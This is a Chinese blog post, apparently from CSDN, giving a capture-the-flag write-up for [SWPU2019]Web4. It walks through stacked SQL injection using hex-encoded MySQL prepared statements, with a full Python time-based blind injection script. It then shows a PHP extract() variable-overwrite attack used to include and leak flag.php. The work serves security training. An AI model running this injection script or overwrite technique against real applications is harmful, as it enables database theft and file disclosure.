[SWPU2019]Web4

最新推荐文章于 2024-05-20 02:54:15 发布
最新推荐文章于 2024-05-20 02:54:15 发布
阅读量647 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全 16进制+mysql预处理 extract函数变量覆盖
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/126909360
版权 
知识点:16进制+mysql预处理,在PDO环境下的sql进行堆叠注入、mvc框架的简单审计、extract函数变量覆盖

分析

登录没反应,注册功能没有,也没有目录穿越和伪协议读取,那么抓个包吧,可以看到状态码,和一个状态信息,试一下注入,可以看到加了单引号报错,双引号却没有,单引号加分号没错,那么就很明显了,是堆叠注入。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
并且还过滤了一大堆关键词,这边就要用16进制+mysql预处理来进行预处理,预处理我理解就是类似动态调用,那么16进制+mysql预处理是怎么进行堆叠注入的呢?我们借助MySQL来看一下。
在这里插入图片描述
从sql界面中可以看出,我们用预处理来执行16进制后的sql语句是可以的,那么我们就可以进行堆叠注入了。
知识点详细了解处:https://xz.aliyun.com/t/3950

mysql> select hex('select sleep(5)');
+--------------------------------+
| hex('select sleep(5)')         |
+--------------------------------+
| 73656C65637420736C656570283529 |
+--------------------------------+
1 row in set (0.01 sec)

mysql> set @a = 0x73656C65637420736C656570283529;
Query OK, 0 rows affected (0.00 sec)

mysql> prepare smtm_test from @a;
Query OK, 0 rows affected (0.00 sec)
Statement prepared

mysql> execute smtm_test;
+----------+
| sleep(5) |
+----------+
|        0 |
+----------+

获取源码文件名-exp

exp出处:https://www.anquanke.com/post/id/194640#h3-4

import requests
import json
import time

def main():
    url = 'http://2f40d5e5-47d2-45c6-9f2c-eeafd0786245.node4.buuoj.cn:81/index.php?r=Login/Login'
    payloads = "admin';set @a=0x{0};prepare smtm_test from @a;execute smtm_test-- -"
    flag = ''
    for i in range(27,30):
        payload = 'select if(ascii(substr((select  flag from flag),{0},1))={1},sleep(3),0)'
        for j in range(32,127):
            datas = {"username":payloads.format(str_to_hex(payload.format(i,j))),"password":"123456"}
            data = json.dumps(datas)
            times = time.time()
            res = requests.post(url=url, data=data)
            if time.time() - times >= 3:
                flag = flag + chr(j)
                print(flag)
                break


def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])

if __name__ == '__main__':
    main()

源码文件:glzjin_wants_a_girl_friend.zip

利用点

flag文件提示我们要通过某些方法访问它。
在这里插入图片描述

fun.php中解释了路由的构成。 例如:Login/Index就是LoginController下的actionIndex函数
在这里插入图片描述
也就是说r=Login/Index访问了Controller文件夹下的文件。
在这里插入图片描述
在BaseController.php中看到了一个extract函数,可以用来变量覆盖,且这是一个mvc框架,那么view文件夹下的就是客户端的,$this->viewPath = BASE_PATH . "/View/{$viewName}.php"; include包含了里面传的一个参数,找找哪边可以利用来传参。
在这里插入图片描述
UserController.php中可以传参给BaseController.php中的$viewName属性,此时已经确定了index.php?r=User/Index,接下来就去view/userIndex.php文件看看
在这里插入图片描述
view/userIndex.php中,有一段把图片转为base64然后输出的代码片段,那么我们可以利用extract函数覆盖掉$img_base64/../flag.php,这样就可以得到flag的base64加密后的值了。
在这里插入图片描述

输入参数:
在这里插入图片描述
获得flag:
在这里插入图片描述
在这里插入图片描述

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SWPU2019]Web6
lllffg的博客
03-16 707
[SWPU2019]Web6 SQL注入中的with rollup 利用session.upload_progress进行文件包含和反序列化渗透 一个登陆页面,尝试一下1’ and sleep(4)#后弹出被过滤的回显,然后怎么都没思路,然后输入了下万能密码1’ or 1=1 or ‘1’='1,回显了passwd错误,这证明只对passwd进行的检测 看了下wp 猜测源码太狠了 $sql="select * from users where username='$name' and passwd='$
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
[SWPU2019]Web4 盲注+代码审查
qq_54929891的博客
05-21 768
开始用dirsearch扫描了一下后台,发现没扫出啥玩意儿,或许是一个注入题(又到我的弱处了),先常规的使用 ' ; # 来判断一下 发现当我们只输入1'的时候发现是一个函数文件CBTool.php报错,而1的时候是一个正常的echo错误 看来username确实存在注入点,但不知道是哪个方面的注入 ,试了一下异或,盲注都不行,又超出我注入浅薄的知识了,学习得知一个方法:当输入1'报错,但是1"没有报错的话,那就是堆叠注入了,然后我试了一下最基本的一些堆叠注入,发现都被过滤了,真是有点严啊…… ...
刷题(第三周)
qq_62046696的博客
03-11 713
sess_根我们生成的sha256编码,上传进去了,还差那个文件是否存在,发现upload有mkdir(里面的就是/var/babyctf/$attr)这里的attr我们可以控制,目录!简单来说,file_exits,如果是文件目录都可以为true,文件上传保存在/var/babyctf/$attr/$username/文件名,如果attr=success.txt,那么sess就保存在它里面,最后更改phpsessID为我们上传的sha256的值。变成我们的flag不就可以了吗。s:3:"123";
NewStarCTF 公开赛赛道
m0_62129839的博客
10-29 783
reverse一下倒着取得到最后将回显逆转收获无2.文件包含先进行一个代码审计1219893521,伪随机,给了值,爆破出种子就行if语句playload:flag收获base被禁用rot13反序列化,这类题我觉得是我比较薄弱的地方,好好研究研究:poc链我们这样分析,尾链是Sec-> invoke,倒推__invoke() //当脚本尝试将对象调用为函数时触发clone() //当把一个对象赋给另一个对象时自动调用。
BUUCTF:[SWPU2019]Web4
末初的CSDN博客
03-30 2679
[SWPU2019]Web4 参考:https://www.anquanke.com/post/id/194640#h3-4 题目只有一个登录框,输入账号密码后点击登陆页面无任何相应,注册功能也是尚未开放。查看源代码可以看到一个js文件,F12也可以看到一个网络请求。 js主要功能是将username和password以json格式然后发给index.php?r=Login/Login。 不难发...
[SWPU2019]Web1
qq_42812036的博客
02-15 841
0x00:知识点 MariaDB的SQL注入 无表名,列转换成行注入 0x01:解题 查表名: -1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22...
PDO预处理&& [SWPU2019]Web4
Je3Z的博客
08-13 157
PDO场景下的SQL注入探究 例题 [SWPU2019]Web4 参考 由于题目对username进行了严格的检测,所以无法使用单语句进行注入,但是注入点又存在,于是可以尝试进行堆叠注入。(很多师傅可能就因为不友好的回显卡在这里) 思路 我们但加'报错,然后后面加#正常了,然后我们再尝试了';回显也是正常的,若无法多语句执行,返回页面按理说应该是500,这个正常说明开启了堆叠注入,所以可以联想到想到预处理 import requests,time import json def str_to_hex
详解2016 SWPU CTF web4
一个码农的笔记
10-31 3494
2016年的swpu结束了,很精彩,我玩的很开心 这个题目我在比赛的时候没有做出来,后来根据官方的wp复现了一遍,学到很多东西,官方的wp地址是:http://bobao.360.cn/ctf/detail/173.html 官方给的web4的题解不是特别详细 现在我详细的讲解一下web4,我会详细讲解web4所有的知识点 首先网站有源码泄露,在:web4.08067.me/web/w
swpu前端实验4的实验
04-23
swpu
SWPU大数据概论课程报告
01-31
仅作备份
swpu考试系统
07-01
swpu考试系统,内部的系统
BUU刷题记录——4
weixin_43610673的博客
08-31 1606
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上传图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断
buu刷题(第一周)
qq_62046696的博客
03-01 743
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
BUUCTF__web题解合集(四)
风过江南乱的博客
08-07 1336
一、[GXYCTF2019]禁止套娃 二、[安洵杯 2019]easy_web 三、[GKCTF2020]cve版签到 四、[SWPU2019]Web1 五、[ASIS 2019]Unicorn shop
HCIP-Datacom-ARST自选题库_02_网络安全【道题】
最新发布
2301_80961833的博客
05-20 701
为了防止黑客通过MAC地址攻击用户设备或网络,可将非信任用户的MAC地址配置为黑洞MAC地址,过滤掉非法MAC地址。中间人攻击或IP/MAC Spoofing攻击都会导致信息泄露等危害,且在内网中比较常见,为了防止中间人攻击或IP/MACSpoofing攻击,可以采取以下哪些配置手段?多远题461/805、为了防止仿冒DHCP服务器接入网络,可以在交换机上开启DHCP Snooping功能,配置步骤包括以下哪些选项?开启DHCP Snooping检查DHCP REQUEST报文中CHADDR字段的功能。
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值